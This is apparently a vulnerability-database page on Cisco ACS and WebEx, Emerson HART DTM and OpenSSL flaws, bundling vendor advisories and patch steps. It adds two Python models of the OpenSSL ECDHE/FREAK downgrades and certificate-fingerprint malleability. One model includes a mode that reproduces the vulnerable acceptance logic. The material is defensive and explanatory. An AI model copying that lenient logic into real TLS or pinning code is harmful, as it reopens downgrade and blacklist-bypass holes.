VARIoT IoT vulnerabilities database
| VAR-201501-0329 | CVE-2014-8028 | Cisco Secure Access Control System of Web Cross-site scripting vulnerability in the framework |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web framework in Cisco Secure Access Control System (ACS) allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, aka Bug ID CSCuq79019.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
These issues are being tracked by Cisco Bug ID CSCuq79019. Cisco Secure ACS controls network access through RADIUS and network device administrative access through TACACS+.
| VAR-201501-0330 | CVE-2014-8029 | Cisco Secure Access Control System of Web Open redirect vulnerability in interface |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in the web interface in Cisco Secure Access Control System (ACS) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an unspecified parameter, aka Bug ID CSCuq74150. The vendor has confirmed the vulnerability and tracks it as Bug ID CSCuq74150. Supplementary information: the weakness is classified as CWE-601, URL Redirection to Untrusted Site (Open Redirect), http://cwe.mitre.org/data/definitions/601.html. A third party can use the unspecified parameter to send users to an arbitrary web site and mount a phishing attack.
An attacker can leverage this issue to conduct phishing attacks; other attacks are possible.
This issue is being tracked by Cisco Bug ID CSCuq74150. Cisco Secure ACS controls network access through RADIUS and network device administrative access through TACACS+.
| VAR-201501-0331 | CVE-2014-8030 | Cisco WebEx Meetings Server of sendPwMail.do Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in sendPwMail.do in Cisco WebEx Meetings Server allows remote attackers to inject arbitrary web script or HTML via the email parameter, aka Bug ID CSCuj40381.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuj40381. Cisco WebEx Meetings Server (CWMS) is the WebEx conferencing product that provides audio, video and web conferencing.
| VAR-201501-0332 | CVE-2014-8031 | Cisco WebEx Meetings Server Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Meetings Server allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuj40456.
An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
This issue is being tracked by Cisco Bug ID CSCuj40456. Cisco WebEx Meetings Server (CWMS) is the WebEx conferencing product that provides audio, video and web conferencing.
| VAR-201501-0333 | CVE-2014-8032 | Cisco WebEx Meetings Server of OutlookAction LI Vulnerable to obtaining important encrypted password information |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The OutlookAction LI in Cisco WebEx Meetings Server allows remote authenticated users to obtain sensitive encrypted-password information via unspecified vectors, aka Bug IDs CSCuj40453 and CSCuj40449.
An attacker can leverage this issue to obtain sensitive information that may aid in further attacks.
This issue is being tracked by Cisco bug IDs CSCuj40453 and CSCuj40449. Cisco WebEx Meetings Server (CWMS) is the WebEx conferencing product that provides audio, video and web conferencing. The vulnerability is in the OutlookAction LI component of CWMS.
| VAR-201501-0334 | CVE-2014-8033 | Cisco WebEx Meetings Server of play/modules Vulnerability in components gaining administrator access |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The play/modules component in Cisco WebEx Meetings Server allows remote attackers to obtain administrator access via crafted API requests, aka Bug ID CSCuj40421.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks.
This issue is tracked by Cisco Bug ID CSCuj40421. Cisco WebEx Meetings Server (CWMS) is the WebEx conferencing product that provides audio, video and web conferencing. The vulnerability is in the play/modules component of CWMS.
| VAR-201501-0399 | CVE-2014-9191 | CodeWrights 'HART DTM' Library Local Denial of Service Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The CodeWrights HART Device Type Manager (DTM) library in Emerson HART DTM before 1.4.181 allows physically proximate attackers to cause a denial of service (DTM outage and FDT Frame application hang) by transmitting crafted response packets on the 4-20 mA current loop. A Device Type Manager is the FDT component that represents a field device inside an FDT Frame application; the CodeWrights HART DTM library implements the HART protocol for these DTMs. The flaw is a denial-of-service vulnerability exploitable by an attacker with physical access to the current loop.
An attacker may exploit this issue to cause denial-of-service conditions.
| VAR-201501-0328 | CVE-2014-8027 | Cisco Secure Access Control System of RBAC Vulnerability of obtaining network device administrator privileges in components |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
The RBAC component in Cisco Secure Access Control System (ACS) allows remote authenticated users to obtain Network Device Administrator privileges for Create, Delete, Read, and Update operations via crafted HTTP requests, aka Bug ID CSCuq79034. Cisco Secure Access Control System is prone to a privilege-escalation vulnerability.
A remote authenticated attacker can exploit this issue to gain elevated privileges on an affected device.
This issue is being tracked by Cisco Bug ID CSCuq79034. RBAC is the role-based access control component of ACS.
| VAR-201501-0436 | CVE-2014-3572 | OpenSSL 'ssl3_get_key_exchange' Function ECDHE-to-ECDH Downgrade (Forward Secrecy Loss) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message. OpenSSL is prone to a security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions. This may lead to other attacks.
The Common Vulnerabilities and Exposures project identifies the following issues:
CVE-2014-3569
Frank Schmirler reported that the ssl23_get_client_hello function in
OpenSSL does not properly handle attempts to use unsupported
protocols.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc. reported that a carefully crafted
DTLS message can cause a segmentation fault in OpenSSL due to a NULL
pointer dereference.
CVE-2014-8275
Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project
and Konrad Kraszewski of Google reported various certificate
fingerprint issues, which allow remote attackers to defeat a
fingerprint-based certificate-blacklist protection mechanism.
For the stable distribution (wheezy), these problems have been fixed in
version 1.0.1e-2+deb7u14.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
For the unstable distribution (sid), these problems have been fixed in
version 1.0.1k-1.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
I. Background
FreeBSD includes software from the OpenSSL Project.
II. Problem Description
[CVE-2014-3569] This does not affect FreeBSD's default build.
[CVE-2014-3570]
III. Impact
[CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all daemons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04604357
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04604357
Version: 1
HPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent
running OpenSSL, Remote Disclosure of Information, Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-03-19
Last Updated: 2015-03-19
Potential Security Impact: Remote disclosure of information, unauthorized
access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO
Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:
The SSL vulnerability known as "FREAK", which could be exploited remotely to
allow disclosure of information.
Other vulnerabilities which could be exploited remotely resulting in
unauthorized access.
References:
CVE-2014-3570
CVE-2014-3572
CVE-2014-8275
CVE-2015-0204
SSRT101987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
CVE-2014-3572 and CVE-2015-0204
HP IceWall MCRP Version 2.1 and 3.0
HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0
HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version
10.0
HP IceWall Federation Agent Version 3.0
CVE-2014-3570 and CVE-2014-8275
HP IceWall MCRP v2.1, v3.0
HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
HP IceWall SSO Agent v8.0 and v8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates and workaround instructions to
resolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and
Federation Agent.
1. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could
be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP
IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to
the OpenSSL library bundled with the OS, and then follow the instructions in
step 3.
Documents are available at the following location with instructions to
switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,
and SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please
download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
3. For HP IceWall products running on RHEL and are using the OS bundled
OpenSSL, RHEL has provided patch or mitigation instructions at the following
location:
https://access.redhat.com/articles/1369543
Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch
for OpenSSL from the following location:
https://access.redhat.com/security/cve/CVE-2014-8275
4. For IceWall products running on HP-UX which are using the OS bundled
OpenSSL, please apply the HP-UX OpenSSL update from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?productNumber=OPENSSL11I
WORKAROUND INSTRUCTIONS
HP recommends the following information to protect against potential risk
from CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
- If possible, do not use the SHOST setting which allows IceWall SSO
Dfw or MCRP to use SSL/TLS protocol to back-end web servers.
- If possible, do not use EXPORT-grade ciphers on the back-end web
servers.
HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch
release 2)
- If possible, do not use the LDAPSSL setting which allows IceWall SSO
Certd to connect to the LDAP server using SSL/TLS protocol.
- If possible, do not use EXPORT-grade ciphers on the LDAP server.
IceWall Federation Agent
- If possible, use "bindings:HTTP-POST" instead of
"bindings:HTTP-Artifact" in the service provider metadata file. With the
"bindings:HTTP-POST" setting, IWFA does not use SSL to communicate with the
IdP server, so the vulnerable client-side code path is not exercised.
Note: The HP IceWall product is only available in Japan.
HISTORY
Version:1 (rev.1) - 19 March 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Copyright 2015 Hewlett-Packard Development Company, L.P.
============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Markus Stenberg discovered that OpenSSL incorrectly handled certain crafted
DTLS messages, leading to a NULL pointer dereference. (CVE-2014-3571)
Chris Mueller discovered that OpenSSL leaked memory when handling repeated
DTLS records for the next epoch. This issue only affected Ubuntu 12.04 LTS,
Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0206)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes, allowing a server to downgrade an ECDHE suite to static ECDH
(CVE-2014-3572) or to substitute a temporary RSA key in a non-export RSA
suite (CVE-2015-0204).
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2014-8275)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication with DH certificates. This issue only affected Ubuntu 14.04
LTS and Ubuntu 14.10. (CVE-2015-0205)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes.
OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
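The two client-side downgrades above (CVE-2014-3572 and CVE-2015-0204) are both failures to check whether a ServerKeyExchange message is consistent with the negotiated ciphersuite. The following is an added example, not OpenSSL code: a small model of that decision as a client should make it, with a `fixed=False` mode that reproduces the lenient pre-1.0.1k behaviour the advisory describes. The `Handshake`, `Certificate` and `ServerKeyExchange` classes and the ciphersuite-name mapping are constructed for the example.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed model of the two server messages the client's decision depends on.
@dataclass
class Certificate:
    key_type: str   # "RSA" or "EC"
    key_bits: int

@dataclass
class ServerKeyExchange:
    key_type: str   # "ECDHE", "DHE", or "RSA" (a temporary RSA key)
    key_bits: int

@dataclass
class Handshake:
    ciphersuite: str
    certificate: Certificate
    server_key_exchange: Optional[ServerKeyExchange] = None

def key_exchange_of(suite: str) -> str:
    """Map an OpenSSL-style ciphersuite name to its key-exchange method."""
    if suite.startswith("EXP-"):
        return "RSA_EXPORT"   # a <=512-bit temporary RSA key is part of the design
    if suite.startswith("ECDHE-"):
        return "ECDHE"
    if suite.startswith(("DHE-", "EDH-")):
        return "DHE"
    if suite.startswith("ECDH-"):
        return "ECDH"         # static ECDH: no forward secrecy, by design
    return "RSA"              # e.g. AES128-SHA: plain RSA key transport

def evaluate(hs: Handshake, fixed: bool = True) -> Tuple[bool, bool, str]:
    """Return (accept, forward_secrecy, reason) for a client seeing this handshake.

    fixed=True applies the policy a correct client must enforce (what 1.0.1k does);
    fixed=False reproduces the lenient pre-fix behaviour the advisory describes.
    """
    kx = key_exchange_of(hs.ciphersuite)
    ske = hs.server_key_exchange

    if kx == "ECDHE":
        if ske is None:
            if fixed or hs.certificate.key_type != "EC":
                return (False, False, "ECDHE suite but ServerKeyExchange is missing")
            # CVE-2014-3572: fall back to the static EC key in the certificate
            return (True, False, "downgraded to static ECDH; forward secrecy lost")
        if ske.key_type != "ECDHE":
            return (False, False, "ServerKeyExchange carries the wrong key type")
        return (True, True, "ephemeral ECDH")

    if kx == "DHE":
        if ske is None or ske.key_type != "DHE":
            return (False, False, "DHE suite but no DH ServerKeyExchange")
        return (True, True, "ephemeral DH")

    if kx == "RSA":
        if ske is None:
            return (True, False, f"RSA key transport to {hs.certificate.key_bits}-bit certificate key")
        if fixed or ske.key_type != "RSA":
            return (False, False, "unexpected ServerKeyExchange in a non-export RSA suite")
        # CVE-2015-0204 (FREAK): encrypt the premaster secret to the server's temporary key
        return (True, False, f"encrypting to a {ske.key_bits}-bit temporary RSA key; downgrade")

    if kx == "RSA_EXPORT":
        if ske is None or ske.key_type != "RSA" or ske.key_bits > 512:
            return (False, False, "export suite requires a <=512-bit temporary RSA key")
        return (True, False, "export-grade RSA: weak by design, disable the suite")

    if kx == "ECDH":
        if ske is not None:
            return (False, False, "static ECDH suite must not carry ServerKeyExchange")
        return (True, False, "static ECDH against the certificate key")

    return (False, False, "unsupported key exchange")

# Constructed scenarios: the two downgrades from the advisory plus an honest handshake.
SCENARIOS = {
    "ecdhe_no_ske": Handshake("ECDHE-ECDSA-AES128-SHA", Certificate("EC", 256)),
    "rsa_with_temp_key": Handshake("AES128-SHA", Certificate("RSA", 2048),
                                   ServerKeyExchange("RSA", 512)),
    "honest_ecdhe": Handshake("ECDHE-RSA-AES128-GCM-SHA256", Certificate("RSA", 2048),
                              ServerKeyExchange("ECDHE", 256)),
}

def run_scenarios(fixed: bool) -> dict:
    return {name: evaluate(hs, fixed) for name, hs in SCENARIOS.items()}

if __name__ == "__main__":
    for mode in (False, True):
        print(f"fixed={mode}")
        for name, (ok, fs, why) in run_scenarios(mode).items():
            print(f"  {name:18} accept={ok!s:5} forward_secrecy={fs!s:5} {why}")
```

The point of the model is that the ciphersuite, not the messages the server chose to send, determines which messages are mandatory or forbidden: an ECDHE suite without ServerKeyExchange and an RSA suite with one are both protocol violations and must abort the handshake, which is exactly what the `fixed=True` branches do.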
DH client certificates accepted without verification [Server] (CVE-2015-0205)
=============================================================================
Severity: Low
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
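The fingerprint issue above is easiest to see on bytes. The following is an added example, not OpenSSL code, built on a constructed toy certificate with a minimal DER encoder and a placeholder signature: it shows the two variants the advisory names (a non-DER length encoding of the outer signatureAlgorithm, and an outer signatureAlgorithm that no longer matches the one inside tbsCertificate), confirms that the full-certificate fingerprint changes while the signed portion does not, and applies the two checks the fix corresponds to (strict DER decoding and an inner/outer algorithm comparison). All helper and constant names are the example's own.

```python
import hashlib

# Minimal DER helpers, constructed for this example.
SEQ, INT, BITSTR, NULL, OID, PRINTABLE = 0x30, 0x02, 0x03, 0x05, 0x06, 0x13
SHA256_WITH_RSA = bytes.fromhex("2a864886f70d01010b")   # OID 1.2.840.113549.1.1.11

def der_len(n: int) -> bytes:
    """Minimal (DER) length encoding."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_len(len(body)) + body

def tlv_long_form(tag: int, body: bytes) -> bytes:
    """BER-legal but not DER: long-form length (0x81 nn) for a body shorter than 128 bytes."""
    assert len(body) < 0x80
    return bytes([tag, 0x81, len(body)]) + body

def parse_tlv(data: bytes, strict: bool):
    """Return (tag, body, raw_tlv, rest); strict=True rejects non-minimal lengths."""
    tag, first = data[0], data[1]
    if first < 0x80:
        n, hdr = first, 2
    else:
        nbytes = first & 0x7F
        n, hdr = int.from_bytes(data[2:2 + nbytes], "big"), 2 + nbytes
        if strict and (n < 0x80 or data[2] == 0):
            raise ValueError("non-minimal DER length encoding")
    end = hdr + n
    return tag, data[hdr:end], data[:end], data[end:]

def parse_seq(body: bytes, strict: bool):
    items = []
    while body:
        tag, val, raw, body = parse_tlv(body, strict)
        items.append((tag, val, raw))
    return items

def alg_id(with_null: bool = True) -> bytes:
    params = tlv(NULL, b"") if with_null else b""
    return tlv(SEQ, tlv(OID, SHA256_WITH_RSA) + params)

def build_cert(outer_alg: bytes) -> bytes:
    """Toy Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }.
    The signature is a placeholder; what matters is that it covers only tbsCertificate."""
    tbs = tlv(SEQ, tlv(INT, b"\x01") + alg_id() + tlv(PRINTABLE, b"toy CA"))
    sig = tlv(BITSTR, b"\x00" + hashlib.sha256(tbs).digest())
    return tlv(SEQ, tbs + outer_alg + sig)

def fingerprint(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def tbs_raw(cert: bytes) -> bytes:
    """The signed portion, parsed leniently (as the pre-fix decoder would)."""
    _, body, _, _ = parse_tlv(cert, strict=False)
    return parse_seq(body, strict=False)[0][2]

def encoding_error(cert: bytes):
    """Hardened check: strict DER plus inner/outer signatureAlgorithm agreement.
    Returns None when the certificate passes, else the reason it was rejected."""
    try:
        _, body, _, _ = parse_tlv(cert, strict=True)
        (_, tbs, _), (_, outer_alg, _), _ = parse_seq(body, strict=True)
        inner_alg = parse_seq(tbs, strict=True)[1][1]
        decode = lambda alg: [(t, v) for t, v, _ in parse_seq(alg, strict=True)]
        if decode(inner_alg) != decode(outer_alg):
            return "signatureAlgorithm differs between tbsCertificate and outer certificate"
    except ValueError as e:
        return str(e)
    return None

# Three encodings of the same signed content (constructed).
GOOD = build_cert(alg_id())
LONG_FORM_LEN = build_cert(tlv_long_form(SEQ, tlv(OID, SHA256_WITH_RSA) + tlv(NULL, b"")))
NO_NULL_PARAMS = build_cert(alg_id(with_null=False))

if __name__ == "__main__":
    for name, cert in (("good", GOOD), ("long-form length", LONG_FORM_LEN),
                       ("no NULL params", NO_NULL_PARAMS)):
        print(f"{name:17} cert={fingerprint(cert)[:16]} tbs={fingerprint(tbs_raw(cert))[:16]} "
              f"check={encoding_error(cert) or 'ok'}")
```

The practical consequence for a blacklist or pinning implementation is in the last two lines of output: the whole-certificate hash is malleable by anyone holding the certificate, while a hash over tbsCertificate (or the SubjectPublicKeyInfo inside it) is not. Key on the signed portion, or reject anything the strict decoder refuses.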
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
